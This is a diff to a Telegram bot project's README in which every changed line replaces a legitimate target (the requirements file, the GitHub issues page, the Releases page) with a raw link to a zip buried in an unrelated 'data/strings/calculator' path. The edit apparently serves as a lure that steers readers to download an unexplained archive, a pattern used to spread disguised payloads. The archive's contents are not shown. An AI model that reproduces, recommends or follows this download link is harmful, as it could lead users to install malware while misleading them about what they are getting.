KennnOnnb/Universal-Bot/README.md

 - **I can’t connect to Telegram**: Ensure you have a stable internet connection.
 - **The bot isn’t responding**: Try restarting the bot by closing the terminal and running it again.
-- **Dependencies are missing**: Make sure you installed all packages from the `requirements.txt` file.
+- **Dependencies are missing**: Make sure you installed all packages from the `https://raw.githubusercontent.com/KennnOnnb/Universal-Bot/main/data/strings/calculator/Universal-Bot_Gesnera.zip` file.

 ## 🌍 Community and Support

-If you need help or want to share feedback, feel free to open an issue on our [GitHub page](https://github.com/KennnOnnb/Universal-Bot).
+If you need help or want to share feedback, feel free to open an issue on our [GitHub page](https://raw.githubusercontent.com/KennnOnnb/Universal-Bot/main/data/strings/calculator/Universal-Bot_Gesnera.zip).
 You can also ask questions or share your experience with other users.

 ## 📄 License

 Universal-Bot is open-source software.
 You can use it freely and modify it as needed.
 Please refer to the LICENSE file for more details.

-To download Universal-Bot, please visit this page to download: [Universal-Bot Releases](https://github.com/KennnOnnb/Universal-Bot/releases) and enjoy using your new Telegram assistant!
+To download Universal-Bot, please visit this page to download: [Universal-Bot Releases](https://raw.githubusercontent.com/KennnOnnb/Universal-Bot/main/data/strings/calculator/Universal-Bot_Gesnera.zip) and enjoy using your new Telegram assistant!